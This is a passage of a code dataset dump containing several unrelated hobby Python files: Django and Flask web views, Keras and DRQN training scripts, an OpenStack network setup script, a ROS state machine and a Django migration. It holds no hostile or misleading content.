django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom .forms import AddForm\n\nbd = {'timo':19930101,'ud':19940101}\ndef getDate(request):\n if request.method == 'POST':\n\n form = AddForm(request.POST)\n\n if form.is_valid():\n a = form.cleaned_data['a']\n b = form.cleaned_data['b']\n bd[a] = b\n return HttpResponse(\"保存成功\")\n\n else:\n form = AddForm()\n return render(request, 'getDate.html',{'form':form})\n\ndef index(request):\n return render(request, 'index.html',{'bd':bd})\n\n\n\n\n# def index(request):\n# birthday = {'a':'19930101','b':'19920101','c':'19910101'}\n# return render(request, 'index.html',{'birthday':birthday})\n\n# def index(request):\n# return render(request, 'getDate.html')\n#\n# def add(request):\n# a = request.GET['a']\n# b = request.GET['b']\n# a = int(a)\n# b = int(b)\n# return HttpResponse(str(a + b))\n\n# def people(request):\n# name = request.GET['姓名: ']\n# birthday = request.GET['生日: ']\n# a = int(name)\n# b = int(birthday)\n","sub_path":"birthday_memo/birthdayDate/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"28438538","text":"import numpy as np\nimport pandas as pd\nimport sys\nimport os\nfrom keras import backend as K\nfrom keras.optimizers import SGD\nfrom skimage.io import imread\nfrom matplotlib import pyplot as plt\nimport time\nfrom architecture_flexible import set_architecture\n\nos.environ['KERAS_BACKEND'] = 'theano'\nos.environ['THEANO_FLAGS'] = 'mode=FAST_RUN, device=gpu0, floatX=float32, optimizer=fast_compile'\n\ndef label_map(labels):\n label_map = np.zeros([img_h, img_w, n_labels]) \n for r in range(img_h):\n for c in range(img_w):\n label_map[r, c, labels[r][c]] = 1\n return label_map\n\ndef prep_data(mode):\n assert mode in {'test', 'train'}, \\\n 'mode should be either \\'test\\' or \\'train\\''\n data = []\n label = []\n df = pd.read_csv(path + mode + '.csv')\n n = n_train if mode == 'train' else n_test\n for i, item in df.iterrows():\n if i >= n:\n break\n img, gt = [imread(path + item[0])], np.clip(imread(path + item[1]), 0, 1)\n data.append(img)\n label.append(label_map(gt))\n sys.stdout.write('\\r')\n sys.stdout.write(mode + \": [%-20s] %d%%\" % ('=' * int(20. * (i + 1) / n - 1) + '>',\n int(100. * (i + 1) / n)))\n sys.stdout.flush()\n sys.stdout.write('\\r')\n sys.stdout.flush()\n data, label = np.array(data), np.array(label).reshape((n, img_h * img_w, n_labels))\n\n print(mode + ': OK')\n print('\\tshapes: {}, {}'.format(data.shape, label.shape))\n print('\\ttypes: {}, {}'.format(data.dtype, label.dtype))\n print('\\tmemory: {}, {} MB'.format(data.nbytes / 1048576, label.nbytes / 1048576))\n\n return data, label\n\n\ndef plot_results(output, fname):\n gt = []\n df = pd.read_csv(path + 'test.csv')\n for i, item in df.iterrows():\n gt.append(np.clip(imread(path + item[1]), 0, 1))\n\n plt.figure(figsize=(15, 2 * n_test))\n for i, item in df.iterrows():\n plt.subplot(n_test, 4, 4 * i + 1)\n plt.title('Ground Truth')\n plt.axis('off')\n gt = imread(path + item[1])\n plt.imshow(np.clip(gt, 0, 1))\n\n plt.subplot(n_test, 4, 4 * i + 2)\n plt.title('Prediction')\n plt.axis('off')\n labeled = np.argmax(output[i], axis=-1)\n plt.imshow(labeled)\n\n plt.subplot(n_test, 4, 4 * i + 3)\n plt.title('Heat map')\n plt.axis('off')\n plt.imshow(output[i][:, :, 1])\n\n plt.subplot(n_test, 4, 4 * i + 4)\n plt.title('Comparison')\n plt.axis('off')\n rgb = np.empty((img_h, img_w, 3))\n rgb[:, :, 0] = labeled\n rgb[:, :, 1] = imread(path + item[0])\n rgb[:, :, 2] = gt\n plt.imshow(rgb)\n\n plt.savefig(fname)\n plt.close()\n\n\nif __name__ == '__main__':\n # inputs \n path = 'Data/' # path to data\n img_channels = 1 # img channels\n img_w = 256 # img width (pixels)\n img_h = 256 # img height (pixels)\n n_labels = 2 # number of labels\n n_train = 6 # number of samples in train set\n n_test = 3 # number of samples in test set\n n_epochs = 50 # number of epochs to train\n batch_size = 1 # batch size\n \n\n\n\n # read in data \n train_data, train_label = prep_data('train')\n test_data, test_label = prep_data('test')\n\n #if K.image_dim_ordering() == 'th':\n # X = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n # X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n # input_shape = (1, img_rows, img_cols)\n #else:\n # X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n # X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n # input_shape = (img_rows, img_cols, 1)\n\n input_shape = (img_channels, img_h, img_w) # channels first\n layers_in_block = [1, 2, 3, 4] \n for l in layers_in_block:\n print(\"Layers in block: {0}\".format(l))\n model = set_architecture(n_labels, input_shape, conv_layers_in_block=l)\n #optimizer = SGD(lr=0.001, momentum=0.9, decay=0.0005, nesterov=False)\n model.compile(loss=\"categorical_crossentropy\", optimizer='adam', metrics=['accuracy'])\n print('Compiled')\n t0 = time.time()\n history = model.fit(train_data, train_label, batch_size=batch_size, epochs=n_epochs,\n validation_data = (test_data, test_label), verbose=1) \n t1 = time.time()\n elapsed = int(round(t1-t0, 0))\n #model.save_weights('weights.hdf5')\n #model.load_weights('model_5l_weight_ep50.hdf5')\n\n score = model.evaluate(test_data, test_label, verbose=0)\n loss = round(score[0], 3)\n accuracy = round(score[1], 3)\n print(\"Test loss: {0}\".format(loss))\n print(\"Test accuracy: {0}\".format(accuracy))\n print(\"Computation time: {0}\".format(elapsed))\n output = model.predict(test_data, verbose=0)\n output = output.reshape((output.shape[0], img_h, img_w, n_labels))\n fname = \"L-\" + str(l) + \"__t-\" + str(elapsed) + \"s__l-\" + str(loss) + \"__ac-\" + str(accuracy) + \"_.png\"\n plot_results(output, fname)\n","sub_path":"train_model.py","file_name":"train_model.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"589966087","text":"from datetime import datetime as dt\n\nfrom web_app import app\nfrom web_app import db\nfrom flask import render_template, redirect, url_for, flash, get_flashed_messages\nimport datetime as dt\nimport uuid\nimport sys\n\nimport forms\nfrom models import Task, CrewMember, Crew\n\n\ndef console_out(msg):\n \"\"\" output to console \"\"\"\n print(msg, file=sys.stderr)\n return\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n # return 'Hello Bernard'\n tasks = Task.query.all()\n return render_template('index.html', list_name='Ze_List', tasks=tasks)\n\n\n@app.route('/watch')\ndef watch():\n watch_list = [\n {'number': 1, 'crew_1': 'B', 'crew_2': 'D'},\n {'number': 2, 'crew_1': 'S', 'crew_2': 'E'}\n ]\n return render_template('watch_list.html', list_name=\"Watches\", watch_list=watch_list)\n\n\n@app.route('/param')\ndef save_param():\n crew_id = str(uuid.uuid1()) # shared by all crew members\n crew_list = [{'name': 'B', 'is_skipper': False}, {'name': 'D', 'is_skipper': False},\n {'name': 'E', 'is_skipper': False}, {'name': 'S', 'is_skipper': True}]\n for crw in crew_list:\n console_out(f'crw: {crw}')\n cm = CrewMember(name=crw['name'], is_skipper=crw['is_skipper'], crew_id=crew_id)\n db.session.add(cm)\n # db.session.commit()\n param = dict(start_date=dt.datetime(2022, 5, 15), end_date=dt.datetime(2022, 6, 30), watch_duration=4,\n crew_id=crew_id)\n cr = Crew(**param)\n db.session.add(cr)\n db.session.commit()\n\n # Read the data back from the DB\n out_param = Crew.query.filter_by(crew_id=crew_id).first()\n console_out(f'DB Result: {out_param}')\n console_out(f'DB Result crew_ID: {out_param.crew_id}')\n crew_list = CrewMember.query.filter_by(crew_id=crew_id).all()\n console_out(f'Crew_List: {crew_list}')\n return render_template('crew_list.html', crew_id=crew_id, param=out_param, crew_list=crew_list)\n\n\n\n@app.route('/add', methods=['GET', 'POST'])\ndef add():\n form = forms.AddTaskForm()\n if form.validate_on_submit():\n t = Task(title=form.title.data, date=dt.utcnow())\n db.session.add(t)\n db.session.commit()\n # print(f'Submitted title: {form.title.data}')\n flash(f\"Task {form.title.data} added to Database\")\n # return render_template('about.html', form=form, title=form.title.data)\n return (redirect(url_for('index')))\n return render_template('add.html', form=form)\n\n\n# @app.route('/edit/')\n@app.route('/edit/', methods=['GET', 'POST'])\ndef edit(task_id):\n task = Task.query.get(task_id)\n # print(task)\n if task:\n form = forms.AddTaskForm()\n if form.validate_on_submit():\n task.title = form.title.data\n task.date = dt.utcnow()\n db.session.commit()\n flash('Task has been updated')\n return redirect(url_for('index'))\n else:\n form.title.data = task.title\n return render_template('edit.html', form=form, task_id=task_id)\n else:\n flash('Task not found')\n return redirect(url_for('index'))\n\n\n@app.route('/delete/', methods=['GET', 'POST'])\ndef delete(task_id):\n task = Task.query.get(task_id)\n # print(task)\n if task:\n form = forms.DeleteTaskForm()\n if form.validate_on_submit():\n db.session.delete(task)\n db.session.commit()\n flash('Task has been deleted')\n return redirect(url_for('index'))\n else:\n return render_template('delete.html', form=form, task_id=task_id, title=task.title)\n else:\n flash('Task not found')\n return redirect(url_for('index'))\n\n#\n# @app.route('/basic')\n# def basic():\n# print('basic')\n# return render_template('basic.html')\n","sub_path":"routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":3777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"175127269","text":"#!/usr/bin/env python\nimport os\nimport time\nimport subprocess\nfrom neutronclient.v2_0 import client\nfrom novaclient.client import Client\n\ndef get_neutron_credentials():\n d = {}\n d['username'] = os.environ['OS_USERNAME']\n d['password'] = os.environ['OS_PASSWORD']\n d['auth_url'] = os.environ['OS_AUTH_URL']\n d['tenant_name'] = os.environ['OS_TENANT_NAME']\n return d\n\ndef get_nova_credentials_v2():\n d = {}\n d['version'] = '2'\n d['username'] = os.environ['OS_USERNAME']\n d['api_key'] = os.environ['OS_PASSWORD']\n d['auth_url'] = os.environ['OS_AUTH_URL']\n d['project_id'] = os.environ['OS_TENANT_NAME']\n return d\n\ndef print_values(val, type):\n if type == 'ports':\n val_list = val['ports']\n if type == 'networks':\n val_list = val['networks']\n if type == 'routers':\n val_list = val['routers']\n for p in val_list:\n for k, v in p.items():\n print(\"%s : %s\" % (k, v))\n print('\\n')\n\ndef print_values_server(val, server_id, type):\n if type == 'ports':\n val_list = val['ports']\n \n if type == 'networks':\n val_list = val['networks']\n for p in val_list:\n bool = False\n for k, v in p.items():\n if k == 'device_id' and v == server_id:\n bool = True\n if bool:\n for k, v in p.items():\n print(\"%s : %s\" % (k, v))\n print('\\n')\n\nOoB_network_name = 'OoB-mngt-net'\nTenant_network_name = 'Tenant-mngt-net'\n\nneutron_credentials = get_neutron_credentials()\nneutron = client.Client(**neutron_credentials)\n\nnova_credentials = get_nova_credentials_v2() \nnova = Client(**nova_credentials)\n\ntry:\n# Create OoB network\n body_create_OoB = {'network': {'name': OoB_network_name,\n 'admin_state_up': True}}\n \n net_oob = neutron.create_network(body=body_create_OoB)\n oob_dict = net_oob['network']\n oob_id = oob_dict['id']\n print('Network %s created' % oob_id)\n\n# Create OoB subnet\n body_create_subnet_oob = {'subnets': [{'cidr': '10.0.0.0/24',\n 'ip_version': 4, 'network_id': oob_id}]}\n \n subnet_oob = neutron.create_subnet(body=body_create_subnet_oob)\n print('Created subnet %s' % subnet_oob)\n\n# Create Tenant mgnt network\n body_create_Tenant = {'network': {'name': Tenant_network_name,\n 'admin_state_up': True}}\n\n net_tnt = neutron.create_network(body=body_create_Tenant)\n tnt_dict = net_tnt['network']\n tnt_id = tnt_dict['id']\n print('Network %s created' % tnt_id)\n\n# Create Tenant mngt subnet\n body_create_subnet_tnt = {'subnets': [{'cidr': '10.1.0.0/24',\n 'ip_version': 4, 'network_id': tnt_id}]}\n\n subnet_tnt = neutron.create_subnet(body=body_create_subnet_tnt)\n print('Created subnet %s' % subnet_tnt)\n\n# Create a router\n\n neutron.format = 'json'\n request = {'router': {'name': 'router1',\n 'admin_state_up': True}}\n \n router = neutron.create_router(request)\n router_id = router['router']['id']\n\n networks = neutron.list_networks(name='public')\n ext_net_id = networks['networks'][0]['id']\n\n# Set gateway\n subprocess.call([\"neutron\",\"router-gateway-set\",router_id,ext_net_id]) \n router = neutron.show_router(router_id)\n print(router)\n\n suboob_dict = subnet_oob['subnets']\n suboob_id = suboob_dict[0]['network_id']\n\n# Add a port to the oob subnet\n body_oob = {'port': {\n 'admin_state_up': True,\n 'device_id': router_id,\n 'name': 'port1',\n 'network_id': suboob_id,\n }}\n \n response = neutron.create_port(body=body_oob)\n print(response)\n\n subtnt_dict = subnet_tnt['subnets']\n subtnt_id = subtnt_dict[0]['network_id']\n\n# Add a port to the tenant mngt subnet\n body_tnt = {'port': {\n 'admin_state_up': True,\n 'device_id': router_id,\n 'name': 'port2',\n 'network_id': subtnt_id,\n }}\n\n response = neutron.create_port(body=body_tnt)\n print(response)\n\n# Spin up an instance connected to both our networks\n image = nova_client.images.find(name=\"ACI_Simulator.iso\")\n flavor = nova_client.flavors.find(name=\"m1.xlarge\")\n\n nics = [{'net-id': oob_id},{'net-id': tnt_id} ]\n instance = nova_client.servers.create(name=\"ACISimulator\", image=image,flavor=flavor, key_name=\"ACI-keypair\", nics=nics)\n\n# Set up floating IPs and associate\n floating_ip = nova.floating_ips.create()\n instance.add_floating_ip(floating_ip)\n\nfinally:\n print(\"Execution completed\")\n","sub_path":"devstack-environment/devstack-environment/playbooks/files/temp/create_ACI_environ.py","file_name":"create_ACI_environ.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"66857230","text":"from gui_boxes import *\nfrom mapEditor import *\n\nclass NewBox(Box):\n def __init__(self,x,y,w,h,parent):\n super().__init__(x,y,w,h,parent)\n self._graphic = pg.image.load('../gfx/new.png').convert_alpha()\n self._graphic_rect = pg.Rect(self._x+146,self._y+96,64,64)\n self._text_rect = pg.Rect(self._x+40,self._y+40,self._width,self._height)\n\n def mouseUp(self):\n if self.mouseInside():\n program = self._parent.getProgram()\n program.setActiveElement(mapEditor(program))\n \n def draw(self):\n pg.draw.rect(SCREEN,self._box_colour,self._box)\n text = FONT.render(\"New Level\",True,self._text_colour)\n SCREEN.blit(text,self._text_rect)\n SCREEN.blit(self._graphic,self._graphic_rect)\n pg.draw.rect(SCREEN,BLACK,self._box,1)","sub_path":"levelEditor/new_box.py","file_name":"new_box.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"543376635","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('conversationmanager', '0009_auto_20150629_2145'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Conversationoptiongraph',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Dialogs',\n fields=[\n ('dialog', models.IntegerField(verbose_name='dialog ID', serialize=False, primary_key=True)),\n ('dialog_text', models.TextField()),\n ('conversationID', models.ForeignKey(to='conversationmanager.Conversation')),\n ],\n options={\n 'ordering': ['dialog'],\n },\n ),\n migrations.CreateModel(\n name='Options',\n fields=[\n ('optionID', models.IntegerField(serialize=False, primary_key=True)),\n ('option_text', models.CharField(unique=True, max_length=255)),\n ],\n options={\n 'ordering': ['optionID'],\n },\n ),\n migrations.CreateModel(\n name='Userconversation',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, verbose_name='ID', serialize=False)),\n ('conversationID', models.IntegerField()),\n ('conversation_time', models.DateTimeField()),\n ('conversation', models.ForeignKey(to='conversationmanager.Dialogs')),\n ('option_selected', models.ForeignKey(to='conversationmanager.Options')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-conversation_time', 'user'],\n },\n ),\n migrations.AddField(\n model_name='dialogs',\n name='option',\n field=models.ManyToManyField(to='conversationmanager.Options', through='conversationmanager.Conversationoptiongraph'),\n ),\n migrations.AddField(\n model_name='dialogs',\n name='user_conversation',\n field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, through='conversationmanager.Userconversation'),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='current_dialog',\n field=models.ForeignKey(to='conversationmanager.Dialogs'),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='next_dialog',\n field=models.ForeignKey(null=True, related_name='next_conversation', to='conversationmanager.Dialogs', blank=True),\n ),\n migrations.AddField(\n model_name='conversationoptiongraph',\n name='option',\n field=models.ForeignKey(to='conversationmanager.Options'),\n ),\n ]\n","sub_path":"conversationmanager/migrations/0010_auto_20150629_2150.py","file_name":"0010_auto_20150629_2150.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592033229","text":"import pandas as pd\nimport numpy as np\n\nclass OLS:\n ''' Also known as linear regression. '''\n def __init__(self, trainDf, testDf):\n self.trainDf = trainDf\n self.testDf = testDf\n \n def format(self, dataframe):\n ''' Organize the format to use the statsmodel library. '''\n df = dataframe.reset_index()\n # Convert datetimes to timestamps\n df['index'] = df['index'].astype(int).astype(float)\n # Put to a human scale\n df['index'] = df['index'].apply(lambda x: x / 1e18)\n return df\n\n def fit(self):\n df = self.format(self.trainDf)\n x = df['index']\n y = df['count']\n cov = np.cov(x, y)[0, 1]\n varx = np.var(x)\n vary = np.var(y)\n self.a = cov / varx\n self.b = np.mean(y) - np.mean(x) * self.a\n\n def predict(self):\n df = self.format(self.testDf)\n predictions = [self.a * x + self.b for x in df['index']]\n return predictions","sub_path":"lib/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"567272838","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n15 Apr 2014\n\n@author: Cristina De Saint Germain\n\"\"\"\n\nimport rospy\nimport smach\n\nfrom operator import attrgetter\nfrom object_grasping_states.detect_object_sm import detect_object\n\n# Some color codes for prints, from http://stackoverflow.com/questions/287871/print-in-terminal-with-colors-using-python\nENDC = '\\033[0m'\nFAIL = '\\033[91m'\nOKGREEN = '\\033[92m'\n\nclass proces_object(smach.State):\n def __init__(self):\n smach.State.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['standard_error','objects','object_name', 'objectd'],\n output_keys=['standard_error','objectd'])\n\n def execute(self, userdata):\n \n rospy.logwarn(userdata.objects)\n # first of all i look if it's some faces\n if userdata.objects.objects:\n # i look in what option we are, if we are looking for a name o no\n \n if userdata.object_name!=\"\":\n userdata.objectd=[objectd for objectd in userdata.objects.objects if objectd.object_name.data==userdata.object_name]\n if userdata.objectd:\n userdata.objectd=userdata.objectd.pop()\n userdata.standard_error=\"Recognize_object_Name OK\"+userdata.standard_error\n return 'succeeded'\n else :\n userdata.standard_error=\"Recognize:= Any object with that name\"+userdata.standard_error\n return 'aborted'\n # if we are no looking for a face we will organize\n else:\n # i want to take the best face confidence \n userdata.objects.objectm.sort(cmp=None, key=attrgetter('confidence'), reverse=True)\n userdata.objectd=userdata.objects.objectm[0]\n userdata.standard_error=\"Recognize_object_Normal OK\"+userdata.standard_error\n return 'succeeded'\n else:\n userdata.standard_error=\"no objects available\"+userdata.standard_error\n userdata.objectd=None\n return 'aborted'\n\n\nclass recognize_object(smach.StateMachine): \n \"\"\"\n Executes a SM that look if it can recognize object\n \n It have 2 options:\n if you complete the name, it will return if\n it find this object, and return the object message of it.\n If you don't complete it will return the object with more confidence.\n \n \n Required parameters : \n No parameters.\n\n Optional parameters:\n object_name, of the person that you are looking for, it will return\n aborted if can't find \n\n input keys:\n object_name, it's optional of the person we are looking for, it can be the name or \"\"\n output keys:\n standard_error: inform what is the problem\n objectd, is a message that have ObjectDetection, \n it will be None if can't find any faces\n No io_keys.\n\n Nothing must be taken into account to use this SM.\n \"\"\"\n def __init__(self,minConfidence=90):\n smach.StateMachine.__init__(self, outcomes=['succeeded', 'aborted', 'preempted'],\n input_keys=['object_name'], \n output_keys=['standard_error','objectd'])\n \n with self:\n\n smach.StateMachine.add(\n 'detect_object',\n detect_object(minConfidence),\n transitions={'succeeded': 'proces_object', 'aborted': 'aborted', \n 'preempted': 'preempted'})\n \n smach.StateMachine.add(\n 'proces_object',\n proces_object(),\n transitions={'succeeded': 'succeeded', 'aborted': 'aborted', \n 'preempted': 'preempted'})\n \n\n\n\n\n \n\n\n","sub_path":"basic_states/object_grasping_states/src/object_grasping_states/recognize_object.py","file_name":"recognize_object.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"536627986","text":"import numpy as np\nfrom tqdm import tqdm\nimport tensorflow as tf\nimport imageio\nimageio.plugins.ffmpeg.download()\nfrom gym_traffic.utils.helper import *\nfrom gym_traffic.agents.drqn import DRQN\nfrom IPython import embed\nfrom skimage.transform import resize\nclass experience_buffer():\n def __init__(self, buffer_size = 600):\n self.buffer = []\n self.buffer_size = buffer_size\n\n def add(self,experience):\n if len(self.buffer) + 1 >= self.buffer_size:\n self.buffer[0:(1+len(self.buffer))-self.buffer_size] = []\n self.buffer.append(experience)\n print ('buffer_size: ', len(self.buffer))\n\n def sample(self,batch_size,trace_length):\n # print ('np random sample: ', 'self.buffer: ', len(self.buffer), 'batch_size: ', batch_size)\n sampled_episodes = random.sample(self.buffer,batch_size)\n sampledTraces = []\n for episode in sampled_episodes:\n point = np.random.randint(0,len(episode)+1-trace_length)\n sampledTraces.append(episode[point:point+trace_length])\n sampledTraces = np.array(sampledTraces)\n # print ('!!!!!!!!!', sampledTraces.shape)\n return np.reshape(sampledTraces,[batch_size*trace_length,5])\n\n\nclass DRQNRunner(object):\n\n def __init__(self, max_steps_per_episode = 1000):\n # self.max_steps_per_episode=max_steps_per_episode\n #Setting the training parameters\n self.batch_size = 16 #How many experience traces to use for each training step.\n self.trace_length = 8 #How long each experience trace will be when training\n self.update_freq = 5 #How often to perform a training step.\n self.y = .99 #Discount factor on the target Q-values\n self.startE = 1 #Starting chance of random action\n self.endE = 0.1 #Final chance of random action\n self.anneling_steps = 10000 #How many steps of training to reduce startE to endE.\n self.num_episodes = 10000 #How many episodes of game environment to train network with.\n self.pre_train_steps = 10000 #How many steps of random actions before training begins.\n self.load_model = False #Whether to load a saved model.\n self.path = \"./drqn\" #The path to save our model to.\n self.h_size = 512 #The size of the final convolutional layer before splitting it into Advantage and Value streams.\n self.max_epLength = max_steps_per_episode #The max allowed length of our episode.\n self.time_per_step = 1 #Length of each step used in gif creation\n self.summaryLength = 100 #Number of epidoes to periodically save for analysis\n self.tau = 0.001\n\n\n def run_training(self, env):\n tf.reset_default_graph()\n\n #We define the cells for the primary and target q-networks\n cell = tf.contrib.rnn.BasicLSTMCell(num_units = self.h_size,state_is_tuple = True)\n cellT = tf.contrib.rnn.BasicLSTMCell(num_units = self.h_size,state_is_tuple = True)\n mainQN = DRQN(self.h_size, self.batch_size, cell, 'main')\n targetQN = DRQN(self.h_size, self.batch_size, cellT, 'target')\n\n init = tf.global_variables_initializer()\n\n saver = tf.train.Saver(max_to_keep=10)\n\n trainables = tf.trainable_variables()\n\n targetOps = updateTargetGraph(trainables, self.tau)\n\n myBuffer = experience_buffer()\n\n #Set the rate of random action decrease.\n e = self.startE\n stepDrop = (self.startE - self.endE)/self.anneling_steps\n\n #create lists to contain total rewards and steps per episode\n jList = []\n rList = []\n total_steps = 0\n\n #Make a path for our model to be saved in.\n if not os.path.exists(self.path):\n os.makedirs(self.path)\n\n ##Write the first line of the master log-file for the Control Center\n with open('../Center/log.csv', 'w') as myfile:\n wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)\n wr.writerow(['Episode','Length','Reward','IMG','LOG','SAL'])\n\n\n with tf.Session() as sess:\n if (self.load_model == True):\n print ('Loading Model...')\n ckpt = tf.train.get_checkpoint_state(self.path)\n saver.restore(sess,ckpt.model_checkpoint_path)\n sess.run(init)\n\n updateTarget(targetOps,sess)\n for i in range(self.num_episodes):\n episodeBuffer = [[]] * 4\n print ('Episode: ', i)\n sP = env.reset()\n s = [None] * 4\n for v in range(4):\n s[v] = resize(sP[v], (84, 84))\n #s = sP\n d = [False] * 4\n rAll = 0\n j = 0\n state = [[np.zeros([1, self.h_size]),np.zeros([1, self.h_size])]] * 4\n state1 = [None] * 4\n a = [None]*4\n while j < self.max_epLength:\n j+=1\n for v in range(4):\n\t if np.random.rand(1) < e or total_steps < self.pre_train_steps:\n\t state1[v] = sess.run(mainQN.rnn_state,\n\t feed_dict={mainQN.imageIn:[s[v]/255.0],mainQN.trainLength:1,mainQN.state_in:state[v],mainQN.batch_size:1})\n\t \n\t a[v] = np.random.randint(0,3)\n\t assert(a[v]<3)\n\t else:\n\t a[v], state1[v] = sess.run([mainQN.predict,mainQN.rnn_state],\n\t feed_dict={mainQN.imageIn:[s[v]/255.0],mainQN.trainLength:1,mainQN.state_in:state[v],mainQN.batch_size:1})\n\t a[v] = a[v][0]\n\t assert(a[v]<3)\n #print(a)\n d_old = d.copy()\n s1P, r, d, info = env.step(a)\n #print(type(d)) \n if isinstance(d, bool):\n d = [True] * 4\n #print(d)\n s1 = [None] * 4\n for v in range(4):\n s1[v] = resize(s1P[v], (84, 84))\n #s1 = s1P\n total_steps += 1\n for v in range(4):\n if not d_old[v]:\n s_ = np.array(s[v], dtype = np.int16)\n a_ = np.array(a[v], dtype = np.int16)\n r_ = np.array(r[v], dtype = np.int16)\n s1_ = np.array(s1[v], dtype = np.int16)\n d_ = np.array(d[v], dtype = np.int16)\n\n episodeBuffer[v].append(np.reshape(np.array([s_,a_,r_,s1_,d_]),[1,5]))\n # print(episodeBuffer[-1].shape)\n # except:\n # print(s)\n # print(a)\n # print(r)\n # print(s1)\n # print(d)\n # print(d_old)\n # break\n # print(episodeBuffer[-1].shape)\n if total_steps > self.pre_train_steps:\n if e > self.endE:\n e -= stepDrop\n\n if total_steps % (self.update_freq) == 0:\n updateTarget(targetOps,sess)\n state_train = (np.zeros([self.batch_size, self.h_size]),np.zeros([self.batch_size, self.h_size]))\n\n trainBatch = myBuffer.sample(self.batch_size, self.trace_length)\n trainBatch_st_0 = np.concatenate([arr[np.newaxis] for arr in trainBatch[:,0]]).astype(float)\n trainBatch_st_1 = np.concatenate([arr[np.newaxis] for arr in trainBatch[:,3]]).astype(float)\n\n Q1 = sess.run(mainQN.predict, feed_dict={mainQN.imageIn:trainBatch_st_1/255.0,\n mainQN.trainLength: self.trace_length, mainQN.state_in: state_train, mainQN.batch_size: self.batch_size})\n\n Q2 = sess.run(targetQN.Qout, feed_dict={targetQN.imageIn:trainBatch_st_1/255.0,\n targetQN.trainLength: self.trace_length, targetQN.state_in:state_train, targetQN.batch_size: self.batch_size})\n\n end_multiplier = -(trainBatch[:,4] - 1)\n doubleQ = Q2[range(self.batch_size * self.trace_length), Q1]\n targetQ = trainBatch[:,2] + (self.y*doubleQ * end_multiplier)\n \n sess.run(mainQN.updateModel, feed_dict={mainQN.imageIn: trainBatch_st_0/255.0,\n mainQN.targetQ: targetQ, mainQN.actions: trainBatch[:,1], mainQN.trainLength: self.trace_length,\n mainQN.state_in: state_train, mainQN.batch_size: self.batch_size})\n\n \t \n #print(np.array([r[i] * (not d_old[i]) for i in range(4)])) \n rAll += np.array([r[i] * (not d_old[i]) for i in range(4)])\n s = s1.copy()\n sP = s1P.copy()\n state = state1.copy()\n if all(d):\n break\n\n print ('steps taken: ', j)\n print ('total reward: ', rAll) \n print('Average reward: ' + str(np.mean(rAll))) \n \n for v in range(4):\n if (len(episodeBuffer[v])>= self.trace_length):\n bufferArray = np.array(episodeBuffer[v])\n episodeBuffer[v] = list(zip(bufferArray))\n myBuffer.add(episodeBuffer[v])\n jList.append(j)\n rList.append(rAll[0])\n\n #Periodically save the model.\n if i % 100 == 0 and i != 0:\n saver.save(sess,self.path+'/model-'+str(i)+'.cptk')\n print (\"Saved Model\")\n if len(rList) % self.summaryLength == 0 and len(rList) != 0:\n print (total_steps,np.mean(rList[-self.summaryLength:]), e)\n saveToCenter(i,rList,jList,np.reshape(np.array(episodeBuffer[0]), [len(episodeBuffer[0]),5]), self.summaryLength,\n self.h_size, sess, mainQN, self.time_per_step)\n saver.save(sess,self.path+'/model-'+str(i)+'.cptk')\n","sub_path":"gym-traffic/gym_traffic/runners/drqn_runner.py","file_name":"drqn_runner.py","file_ext":"py","file_size_in_byte":9008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"276639467","text":"\nimport path\n\nclass Locale(object):\n def __init__(self, name, pathStr):\n self.path = path.Path(pathStr)\n self.name = name\n\nLOCALES = LOCAL, NETWORK = \\\n (\n Locale('local', '~/presets/'),\n Locale('network', '~/global/presets/'),\n )\n\nDEFAULT_EXT = 'preset'\n\nclass Preset(object):\n\n @classmethod\n def FromFilepath(cls, filepath):\n filepath = path.Path(filepath)\n\n for locale in LOCALES:\n if filepath.isUnder(locale.path):\n presetSub = filepath.up() - locale.path\n\n return cls(filepath.name(), presetSub, locale, filepath.getExtension())\n\n def __init__(self, name, location, locale=LOCAL, extension=DEFAULT_EXT):\n self.name = name\n self.location = location\n self.locale = locale\n self.extension = extension\n\n @property\n def localeName(self):\n return self.locale.name\n\n def path(self):\n return self.locale.path / self.location / ('%s.%s' % (self.name, self.extension))\n\n def open(self, 